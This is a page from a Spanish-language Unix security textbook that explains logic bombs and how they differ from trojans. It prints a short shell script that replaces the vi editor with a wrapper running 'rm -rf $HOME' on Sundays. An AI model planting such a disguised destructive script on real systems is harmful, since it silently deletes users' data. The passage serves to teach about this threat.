Siguiente: Canales ocultos
Subir: Fauna y otras amenazas
Anterior: Applets hostiles
Índice General
Las bombas lógicas son en cierta forma similares a los troyanos: se trata de
código insertado en programas que parecen realizar cierta acción útil.
Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que
lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como
una determinada fecha, la existencia de un fichero con un nombre dado, o el
alcance de cierto número de ejecuciones del programa que contiene la bomba;
así, una bomba lógica puede permanecer inactiva en el sistema durante
mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento
anómalo hasta que el daño producido por la bomba ya está hecho. Por
ejemplo, imaginemos la misma situación que antes veíamos para el troyano:
alguien con el suficiente privilegio renombra a vi como vi.old, y
en el lugar del editor sitúa el siguiente código:
#!/bin/sh
if [ `date +%a` = "Sun" ];
then
rm -rf $HOME
else
vi.old $1
fi
Este cambio en el sistema puede permanecer durante años6.4 sin que se produzca
un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo;
pero en el momento en que un usuario decida trabajar este día, la bomba
lógica se va a activar y el directorio de este usuario será borrado.
Siguiente: Canales ocultos
Subir: Fauna y otras amenazas
Anterior: Applets hostiles
Índice General
2003-08-08